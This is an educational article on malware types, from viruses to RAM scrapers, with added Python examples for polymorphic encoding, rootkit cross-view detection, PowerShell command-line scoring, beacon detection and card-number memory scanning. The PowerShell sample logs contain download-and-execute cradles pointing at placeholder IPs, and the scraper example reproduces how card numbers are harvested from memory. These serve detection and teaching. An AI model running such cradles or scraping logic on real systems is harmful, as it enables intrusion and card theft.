Types of Malware
Abdullateef Tunde Abdulsalam
A result-oriented Cyber Security Analyst | Expertise in Threat Detection, Vulnerability Management, SIEM, Cloud & Application Security | MSc Applied Data Science | CEH v12, AZ-900, CompTIA Security+ Certified.
What is Malware?
Malware, or malicious software, is any program or file that harms a computer or its user. Common types of malware include computer viruses, ransomware, worms, trojan horses and spyware. These malicious programs can steal, encrypt or delete sensitive data, alter or hijack core computing functions, and monitor the victim's computer activity.
Cybercriminals use a variety of physical and virtual means to infect devices and networks with malware. For example, WannaCry, a widely reported ransomware attack, spread by exploiting a known vulnerability in Windows SMBv1 for which a patch (MS17-010) had been available for two months. Phishing is another common delivery method: emails disguised as legitimate messages carry malicious links or attachments that deliver executable malware to unsuspecting users.
Sophisticated malware uses a command-and-control (C2) server so the attacker can communicate with the infected system, issue instructions, steal sensitive information from its disks or keep remote access to the device.
Emerging strains of malware include evasion and obfuscation techniques designed to fool users, security administrators and anti-malware products. Evasion ranges from simple tactics such as hiding the attacker's source IP address behind proxies to polymorphic malware, which re-encodes its own body on every copy so that signature-based detection tools never see the same byte pattern twice. Another example is fileless malware, which runs only in a system's RAM and writes no executable to disk, leaving little for file-based scanners to inspect.
Different types of malware have unique traits and characteristics; we'll cover 22 in this post.
Types of Malware
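To make the polymorphism point concrete, here is an added example (not from the original article or from UpGuard) showing why a byte signature written against the malicious body fails while the unchanged decoder stub still matches. It is a model, not malware: PAYLOAD is an inert command string standing in for malicious code and STUB_MARKER is an arbitrary byte pattern standing in for the decryption routine; both are constructed for this illustration.

```python
"""Polymorphic encoding versus static signatures.

Added example, not from the original article. Everything here is
constructed: PAYLOAD is an inert command string standing in for malicious
code, and STUB_MARKER is an arbitrary byte pattern standing in for the
decoder routine that every variant has to carry in clear.
"""
import hashlib
import secrets

PAYLOAD = b"cmd.exe /c whoami && net user"          # constructed stand-in for a malicious body
STUB_MARKER = b"\xeb\x0d\x5e\x31\xc9\xb1"           # constructed bytes, not real x86


def xor_encode(data: bytes, key: int) -> bytes:
    """Single-byte XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key for b in data)


def random_key() -> int:
    """A fresh non-zero key per infection is what makes each copy look different."""
    return secrets.choice(range(1, 256))


def build_variant(key: int) -> bytes:
    """Emit one variant: decoder stub + key byte + encoded body."""
    if not 0 < key < 256:
        raise ValueError("key must be a single non-zero byte")
    return STUB_MARKER + bytes([key]) + xor_encode(PAYLOAD, key)


def unpack_variant(blob: bytes) -> bytes:
    """What execution does: the stub reads the key and decodes the body in memory."""
    key = blob[len(STUB_MARKER)]
    return xor_encode(blob[len(STUB_MARKER) + 1:], key)


def signature_match(blob: bytes, signature: bytes) -> bool:
    """A naive on-disk byte signature, the kind polymorphism is built to defeat."""
    return signature in blob


def compare_detection(keys=(0x41, 0x7F, 0xC3)) -> dict:
    """Run the same body through several keys and count what each approach catches."""
    variants = [build_variant(k) for k in keys]
    body_sig = b"net user"
    return {
        "distinct_hashes": len({hashlib.sha256(v).hexdigest() for v in variants}),
        "body_signature_hits": sum(signature_match(v, body_sig) for v in variants),
        "stub_signature_hits": sum(signature_match(v, STUB_MARKER) for v in variants),
        "after_unpacking_hits": sum(body_sig in unpack_variant(v) for v in variants),
    }


if __name__ == "__main__":
    print(compare_detection())
    # {'distinct_hashes': 3, 'body_signature_hits': 0, 'stub_signature_hits': 3, 'after_unpacking_hits': 3}
```

All three copies hash differently and the body signature finds nothing, yet the constant stub is still a signature. That is why real polymorphic engines mutate the stub as well, and why anti-malware products moved to emulation and in-memory scanning of the unpacked body.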
1. Computer Virus
A virus is a type of malware that, when executed, self-replicates by modifying other computer programs and inserting its own code into them. When this replication succeeds, the affected programs are said to be infected.
Virus writers use social engineering and exploit vulnerabilities to infect systems and spread the virus. Microsoft Windows and macOS are the targets of most viruses, which often use complex anti-detection strategies to evade antivirus software.
Viruses are written to make a profit (e.g., ransomware), to send a message, for personal amusement, to demonstrate that vulnerabilities exist, for sabotage and denial of service, or simply to explore cybersecurity issues, artificial life and evolutionary algorithms.
Computer viruses cause billions of dollars' worth of economic damage by causing system failures, wasting resources, corrupting data, increasing maintenance costs, logging keystrokes and stealing personal information (e.g., credit card numbers).
2. Computer Worm
A computer worm is a self-replicating malware program whose primary purpose is to infect other computers by duplicating itself, while remaining active on the systems it has already infected.
Worms typically spread over computer networks, relying on vulnerabilities or security failures on the target computer to gain access. Worms almost always cause at least some harm to a network, even if only by consuming bandwidth. This differs from viruses, which almost always corrupt or modify files on the victim's computer.
WannaCry is a well-known example of a ransomware cryptoworm: it spread without user action by using the EternalBlue exploit against the Windows SMBv1 vulnerability patched in MS17-010.
While many worms are designed only to spread and not to change the systems they pass through, even payload-free worms can cause major disruptions. The Morris worm of 1988 took down large parts of the early Internet purely through the load of repeated re-infection, and the 2004 mass-mailing worm Mydoom disrupted networks largely through the volume of email it generated; in both cases propagation, not the payload, did much of the damage.
3. Trojan Horse
A trojan horse, or trojan, is any malware that misleads users about its true intent by pretending to be a legitimate program. The term is derived from the Ancient Greek story of the deceptive wooden horse that led to the fall of the city of Troy.
Trojans are generally spread by social engineering such as phishing.
For example, a user may be tricked into executing an email attachment disguised to appear genuine (e.g., an executable with an Excel icon and a spreadsheet-like name). Once the file is opened, the trojan installs itself.
While the payload of a trojan can be anything, most act as a backdoor giving the attacker unauthorized access to the infected computer. Trojans can expose personal information such as internet activity, banking login credentials, passwords or personally identifiable information (PII). Ransomware attacks are also commonly delivered via trojans.
Unlike computer viruses and worms, trojans do not generally attempt to inject malicious code into other files or propagate themselves.
4. Rootkits
A rootkit is a collection of software, typically malicious, designed to give unauthorized access to a computer or an area of its software, and it usually masks its own existence or the existence of other software.
Rootkit installation can be automated, or an attacker can install it once they have administrator access. That access is typically obtained through a direct attack on the system, such as exploiting vulnerabilities, cracking passwords or phishing.
Rootkit detection is difficult because a rootkit can subvert the very antivirus program intended to find it. Detection methods include scanning from a trusted operating system (booting the suspect disk from known-clean media), behavioural analysis, signature scanning, difference scanning (comparing what the running system reports against a lower-level or external view of the same data) and memory-dump analysis.
Rootkit removal can be complicated or practically impossible, especially when the rootkit resides in the kernel; reinstalling the operating system is often the only reliable option. Firmware rootkits may require hardware replacement or specialized equipment.
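Difference scanning is the one method on that list a reader can try without a vendor tool. The following is an added example, not the article's own, of a cross-view check on Linux: it compares the PIDs that readdir() on /proc reports, the view a rootkit hooking directory listing can filter, with the PIDs the kernel admits to when each is probed directly with kill(pid, 0). The pid_max path and the Tgid field are standard Linux procfs; the classification logic is my own.

```python
"""Cross-view ("difference scanning") check for processes hidden from /proc.

Added example, not from the original article; Linux only. It compares two
views of the process list: what readdir() on /proc reports (the view a
rootkit that hooks directory listing can filter) against what the kernel
admits to when asked about each PID directly with kill(pid, 0).
"""
import os

PID_MAX_PATH = "/proc/sys/kernel/pid_max"


def pids_from_procfs() -> set:
    """View 1: numeric entries in /proc, as ps and top would see them."""
    return {int(n) for n in os.listdir("/proc") if n.isdigit()}


def pids_from_kill_probe(pid_max: int) -> set:
    """View 2: kill(pid, 0) delivers no signal but still fails with ESRCH for a
    dead PID and succeeds (or fails with EPERM) for a live one, hidden or not."""
    alive = set()
    for pid in range(1, pid_max + 1):
        try:
            os.kill(pid, 0)
        except ProcessLookupError:
            continue
        except PermissionError:
            pass
        alive.add(pid)
    return alive


def read_tgid(pid: int):
    """Thread-group id from /proc/<pid>/status, or None if the entry is unreadable.
    Thread IDs answer kill() but are never listed in /proc, so they must be excluded."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        return None
    return None


def classify_hidden(listed: set, probed: set, tgid_of) -> list:
    """Pure comparison logic, kept separate so it can be tested on constructed data.
    A PID is suspicious if the kernel knows it, /proc does not list it, and it is
    not merely a thread belonging to some other process."""
    hidden = []
    for pid in sorted(probed - listed):
        tgid = tgid_of(pid)
        if tgid is None or tgid == pid:
            hidden.append(pid)
    return hidden


def scan() -> list:
    """Live scan of this host (requires Linux procfs)."""
    with open(PID_MAX_PATH) as f:
        pid_max = int(f.read())
    return classify_hidden(pids_from_procfs(), pids_from_kill_probe(pid_max), read_tgid)


if __name__ == "__main__":
    hits = scan()
    print("suspicious PIDs:", hits or "none (re-run to rule out PIDs that exited mid-scan)")
```

A rootkit that also hooks kill() defeats this particular pair of views, which is why the same comparison is better made from outside the running OS (a trusted boot medium or a memory image). Processes that start or exit between the two views show up as transient differences; re-run and compare before treating a PID as hidden.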
5. Ransomware
Ransomware is malware designed to deny access to a computer system or its data, usually by encrypting files, until a ransom is paid. It spreads through phishing emails, malvertising, compromised websites and the exploitation of vulnerabilities.
Ransomware attacks cause downtime, data leaks, intellectual property theft and data breaches; many current groups also steal data before encrypting it and threaten to publish it (double extortion).
Ransom demands range from a few hundred dollars to hundreds of thousands or more, typically payable in cryptocurrencies such as Bitcoin.
6. Keylogger
Keyloggers, also called keystroke loggers or system monitors, are a type of malware that monitors and records each keystroke typed on a computer's keyboard. Keyloggers also exist for smartphones.
Keyloggers store the captured data and send it to the attacker, who can then extract sensitive information such as login credentials and credit card details.
7. Grayware
The term grayware came into use in September 2004 and describes unwanted applications or files that aren't classified as malware but degrade the computer's performance and can create security risk.
At a minimum, grayware behaves in an annoying or undesirable manner; at worst, it monitors the system and phones home with information.
Grayware generally refers to adware and spyware. The good news is that most antivirus software can detect potentially unwanted programs (PUPs) and offer to remove them.
Adware and spyware are generally easy to remove because they are far less deeply embedded than malware such as rootkits.
The bigger concern is the mechanism the grayware used to gain access to the computer, be it social engineering, unpatched software or other vulnerabilities. Other forms of malware, such as ransomware, can use the same route in.
Treat the presence of adware as a warning that the device or user has a weakness that should be corrected.
8. Fileless Malware
Fileless malware is malware that runs its code through legitimate, already-installed programs (for example PowerShell, WMI or the Windows Script Host) instead of dropping its own executable. Because there is no malicious file on disk to scan, it is hard for file-based anti-malware software to detect and remove. The payload exists primarily as an artifact in memory (RAM), although attackers commonly park a small launcher in the registry or a WMI event subscription so that it comes back after a reboot.
Fileless malware became a mainstream cyber threat around 2017 but has been around for much longer: Frodo, Number of the Beast and Dark Avenger are often cited as early examples of malware that lived largely in memory. More recently, the Democratic National Committee and Equifax breaches have been linked to fileless techniques.
Because fileless malware writes little or nothing of its activity to the hard drive, it resists defensive and anti-forensic measures that depend on files: application whitelisting, signature detection, hardware verification, pattern analysis and file timestamping.
It therefore leaves very little evidence for digital forensics investigators, who must turn to memory capture, command-line and script-block logging, and process telemetry instead. That said, because it is designed to work in memory, a purely fileless payload generally exists only until the system is rebooted.
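As an added example (not part of the original article), here is the kind of check a SOC writes for fileless activity: score process command lines for PowerShell launched with encoding or download-and-execute primitives, decoding -EncodedCommand payloads because the interesting strings are hidden inside them. The sample lines, the pattern weights and the alert threshold are all constructed for illustration, modelled loosely on the CommandLine field of Sysmon Event ID 1 or Windows Security event 4688; the IP addresses are documentation ranges.

```python
"""Scoring process command lines for fileless PowerShell tradecraft.

Added example, not from the original article. SAMPLE_LOGS are constructed
strings loosely shaped like the CommandLine field of Sysmon Event ID 1 /
Windows Security 4688; the weights and the threshold are illustrative
choices, not a vendor rule set. IP addresses are documentation ranges.
"""
import base64
import binascii
import re


def _enc(ps: str) -> str:
    """powershell -EncodedCommand expects base64 of UTF-16LE, not UTF-8."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


SAMPLE_LOGS = [  # constructed, not real telemetry
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1',
    'powershell.exe -nop -w hidden -enc '
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"),
    'powershell.exe -EncodedCommand ' + _enc(r"Get-ChildItem C:\Users"),
    'rundll32.exe shell32.dll,Control_RunDLL timedate.cpl',
    'wmic.exe process call create "powershell -nop -c '
    'IEX((New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/b\'))"',
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the common
# spellings seen in the wild are matched here.
ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})",
                      re.IGNORECASE)

# (pattern, weight): execution-hiding flags score low, download-and-run primitives high.
WEIGHTS = [
    (r"-nop\b|-noprofile\b", 1),
    (r"-ep\s+bypass|-executionpolicy\s+bypass", 1),
    (r"-w(?:indowstyle)?\s+hidden", 2),
    (r"FromBase64String", 2),
    (r"\bIEX\b|Invoke-Expression", 3),
    (r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest", 3),
]
ENCODED_WEIGHT = 2   # presence of an encoded command adds weight but is not decisive
THRESHOLD = 4


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_command_line(cmdline: str, threshold: int = THRESHOLD) -> dict:
    """Score the visible command line plus anything hidden inside an encoded payload."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline} {decoded}"
    score = ENCODED_WEIGHT if decoded is not None else 0
    hits = []
    for pattern, weight in WEIGHTS:
        for m in re.finditer(pattern, text, re.IGNORECASE):
            hits.append(m.group(0))
            score += weight
    return {"cmdline": cmdline, "decoded": decoded, "hits": hits,
            "score": score, "flagged": score >= threshold}


def triage(lines) -> list:
    return [score_command_line(line) for line in lines]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOGS):
        print(f"{'ALERT' if r['flagged'] else 'ok   '} score={r['score']:2d} {r['cmdline'][:60]}")
```

Encoding by itself only adds weight, since administrators use -EncodedCommand legitimately (the third sample stays below the threshold); the combination of a hidden window, no profile and a download cradle is what tips the score. In production, feed the same logic from PowerShell script-block logging (Event ID 4104) as well, because the decoded script is what you actually want to search.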
9. Adware
Adware is a type of grayware designed to put advertisements on your screen, often in a web browser or a pop-up.
Typically, it passes itself off as legitimate software or piggybacks on another program to trick you into installing it on your computer, tablet or smartphone.
Adware is one of the most profitable and least harmful forms of malware and is increasingly common on mobile devices. It generates revenue by automatically displaying advertisements to the user of the software.
10. Malvertising
Malvertising, a portmanteau of malicious advertising, is the use of advertising to spread malware. It typically involves injecting malicious or malware-laden advertisements into legitimate advertising networks and web pages.
Advertising is an effective way to spread malware because significant effort goes into making ads attractive enough for users to click.
Malvertising also benefits from the reputation of the sites it is placed on, such as high-profile and reputable news websites; the visitor never has to leave a trusted page to be exposed.
11. Spyware
Spyware is malware that gathers information about a person or organization, usually without their knowledge, and sends it to the attacker without the victim's consent.
Spyware usually aims to track and sell your internet usage data, capture your credit card or bank account information, or steal personally identifiable information (PII).
Some types of spyware can install additional software and change settings on your device. Spyware is usually simple to remove because it is not as deeply embedded as other types of malware.
12. Bots and Botnets
A bot is a computer infected with malware that allows it to be remotely controlled by an attacker.
The bot (or zombie computer) can then be used to launch further cyber-attacks or become part of a botnet (a collection of bots under one controller).
Botnets are a popular platform for distributed denial-of-service (DDoS) attacks, spam campaigns, spreading ransomware, keylogging and distributing other types of malware. Each bot periodically checks in with its command-and-control server for instructions, and that check-in pattern is what network defenders look for.
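Because every bot has to check in with its controller, the regularity of that check-in is one of the more reliable ways to find one. The following added example (not from the original article) builds a constructed connection log with a seeded RNG, using documentation IP ranges, and flags source-destination pairs whose inter-connection gaps have a low coefficient of variation; the thresholds are starting points for tuning, not vendor defaults.

```python
"""Spotting C2 beaconing in connection logs by inter-arrival regularity.

Added example, not from the original article. The connection records are
constructed with a seeded RNG (documentation IP ranges) so the run is
repeatable; the thresholds are starting points to tune per environment.
"""
import random
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def make_sample_connections(seed: int = 7) -> list:
    """Constructed outbound connection log: (timestamp, src, dst, dport)."""
    rng = random.Random(seed)
    start = datetime(2024, 5, 1, 9, 0, 0)
    rows = []

    # Implant checking in every 60 s with a few seconds of jitter.
    t = start
    for _ in range(30):
        rows.append((t, "10.0.0.15", "203.0.113.5", 443))
        t += timedelta(seconds=60 + rng.uniform(-3, 3))

    # Same host browsing a normal site: bursty, human-paced gaps.
    t = start
    for _ in range(30):
        rows.append((t, "10.0.0.15", "198.51.100.20", 443))
        t += timedelta(seconds=rng.expovariate(1 / 90))

    # Another host with too few connections to judge either way.
    for i in range(3):
        rows.append((start + timedelta(minutes=10 * i), "10.0.0.22", "192.0.2.9", 8443))

    rows.sort()
    return rows


def beacon_candidates(rows, min_connections: int = 10, max_cv: float = 0.2) -> list:
    """Group by (src, dst, dport); a low coefficient of variation (stdev / mean) of the
    gaps between connections means a machine, not a person, is setting the pace."""
    by_pair = defaultdict(list)
    for ts, src, dst, dport in rows:
        by_pair[(src, dst, dport)].append(ts)

    findings = []
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        findings.append({
            "pair": pair,
            "connections": len(times),
            "mean_gap_s": round(mean_gap, 1),
            "cv": round(cv, 3),
            "beacon": cv <= max_cv,
        })
    return sorted(findings, key=lambda f: f["cv"])


def beacons_by_dst(rows) -> dict:
    """Convenience view: destination -> beacon verdict for pairs with enough data."""
    return {f["pair"][1]: f["beacon"] for f in beacon_candidates(rows)}


if __name__ == "__main__":
    for f in beacon_candidates(make_sample_connections()):
        print(f)
```

Modern implants add jitter and sleep skew precisely to raise that coefficient, so pair the timing test with payload-size consistency and destination rarity rather than relying on it alone.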
13. Backdoor
A backdoor is a covert method of bypassing normal authentication or encryption in a computer, product, embedded device (e.g., a router) or other part of a computer system.
Backdoors are commonly used to secure remote access to a computer or to gain access to encrypted files. From there, the attacker can read, corrupt, delete or exfiltrate sensitive data.
Backdoors can take the form of a hidden part of a program (a trojan horse), a separate program, or code in firmware or the operating system.
Further, backdoors can be secretly planted or widely known. Many have ostensibly legitimate use cases, such as a manufacturer needing a way to reset user passwords, but a backdoor the vendor can use is one an attacker can use as soon as its existence leaks.
14. Browser Hijacker
A browser hijacker, or hijackware, changes the behaviour of a web browser by redirecting the user to a new page, changing their home page or default search engine, installing unwanted toolbars, displaying unwanted ads or directing users to a different website.
15. Crimeware
Crimeware is a class of malware designed to automate cybercrime.
It is built to perpetrate identity theft, using social engineering or stealth to access the victim's financial and retail accounts in order to steal funds or make unauthorized transactions. Alternatively, it may steal confidential or sensitive information as part of corporate espionage.
16. Malicious Mobile Apps
Not all apps available through the App Store and Google Play are legitimate, though both are far safer than apps sideloaded from outside the official stores; Apple's App Store is generally regarded as the stricter of the two in pre-screening third-party apps.
Malicious apps can steal user information, attempt to extort users, gain access to corporate networks, force users to view unwanted ads or install a backdoor on the device.
17. RAM Scraper
A RAM scraper is a type of malware that harvests data temporarily held in memory (RAM). It often targets point-of-sale (POS) systems such as cash registers, because a POS application may hold a card's unencrypted track data for a brief period between reading the card and encrypting the data for transmission to the back end; the scraper searches process memory for card-number patterns during that window.
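To show what a RAM scraper actually does during that window, here is an added example (not from the original article) that scans a constructed memory buffer for 13- to 19-digit runs and keeps those that pass the Luhn check, exactly the filter scrapers use to discard serial numbers and timestamps. The buffer imitates track-1 and track-2 records using the industry test numbers 4111 1111 1111 1111 and 5555 5555 5555 4444 plus decoy digit runs; no real card data is involved. Responders run the same scan over a real dump to scope how much cardholder data was exposed.

```python
"""Finding card numbers in a memory dump the way a RAM scraper does.

Added example, not from the original article. SAMPLE_MEMORY is a constructed
buffer imitating what a POS process might hold for a moment between the card
read and encryption: track-1- and track-2-shaped records using industry test
PANs (4111..., 5555...), plus decoy digit runs. The same scan is what a
responder runs over a real dump to scope exposure.
"""
import re

SAMPLE_MEMORY = (  # constructed, no real cardholder data
    b"\x00\x00POS-TERM-07\x00"
    b"%B4111111111111111^DOE/JANE^25121010000?"      # track-1-shaped record
    b"\x00\x00;5555555555554444=2512101123?\x00"      # track-2-shaped record
    b"serial=1234567812345678\x00"                     # 16 digits, fails Luhn
    b"4111111111111112\x00"                            # test PAN with last digit changed
    b"order 98765 total 12.50\x00"
)

# 13 to 19 digits not bordered by other digits: catches PANs in track data and
# in plain text while skipping longer serial-style runs.
PAN_RUN = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Luhn mod-10 check: double every second digit from the right, sum, test %10 == 0.
    RAM scrapers use it to throw away serial numbers and timestamps that merely look like PANs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """PCI-style display form: first six and last four digits only."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def scan_for_pans(buf: bytes) -> list:
    """Return every Luhn-valid candidate with its offset; callers should log the mask, not the PAN."""
    found = []
    for m in PAN_RUN.finditer(buf):
        candidate = m.group(1).decode("ascii")
        if luhn_valid(candidate):
            found.append({"offset": m.start(1), "pan": candidate, "masked": mask(candidate)})
    return found


def found_pans(buf: bytes = SAMPLE_MEMORY) -> list:
    return [hit["pan"] for hit in scan_for_pans(buf)]


if __name__ == "__main__":
    for hit in scan_for_pans(SAMPLE_MEMORY):
        print(f"offset {hit['offset']:4d}: {hit['masked']}")
```

The defensive lesson is in the buffer itself: if the PAN never appears in application memory in clear (point-to-point encryption at the card reader), there is nothing for the scraper to find.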
18. Rogue Security Software
Rogue security software tricks users into thinking their system has a security problem such as a virus and entices them to pay to have it removed. The fake security software is itself the malware that needs to be removed.
19. Cryptojacking
Cryptojacking is the use of malware, or of malicious scripts embedded in web pages, to hijack a victim's computing power to mine cryptocurrency for the attacker; the victim pays in electricity, performance and hardware wear.
20. Hybrid Malware
Today most malware combines techniques from several existing categories, often trojan horses, worms, viruses and ransomware.
For example, a program may appear to be a trojan but, once executed, behave as a worm and try to attack other victims on the network.
21. Social Engineering and Phishing
While social engineering and phishing aren't malware per se, they are popular delivery mechanisms for malware attacks. For example, a phisher may try to get a user to log into a phishing website but also attach an infected file to the email to increase the chances of success.
22. Bugs
Like social engineering and phishing, bugs aren't malware, but they can open vulnerabilities for malware to exploit. A prime example is the SMBv1 flaw in Windows (patched in MS17-010) targeted by the EternalBlue exploit, which enabled the spread of the WannaCry ransomware cryptoworm.
How Does Malware Spread?
There are six common ways that malware spreads:
How to Find and Remove Malware
The increasing sophistication of malware means finding and removing it can be harder than ever.
Many malware infections start out as a trojan horse or worm and then add the victim's computer to a botnet, giving the attacker a foothold in the victim's computer and network.
If you're lucky, you can spot the malware's executables among the running processes, but the rise of fileless malware is making this more difficult.
Unfortunately, finding and removing malware is becoming harder because you may never know the full extent of the infection. Often you're better off backing up any data and reimaging the computer.
Prevention is key. Keep your systems patched, continuously monitor for vulnerabilities, and educate your staff on the dangers of executing attachments and programs from suspicious emails. And remember, third-party risk and fourth-party risk exist.
You need to make sure your third-party risk management framework and vendor risk management program force your vendors to keep their systems secure and free of malware, just as you do. Customers don't care whether it was you or your vendors who caused a data breach or data leak. Don't join our list of the biggest data breaches.
Source: Abi Tyas Tunggal: www.upguard.com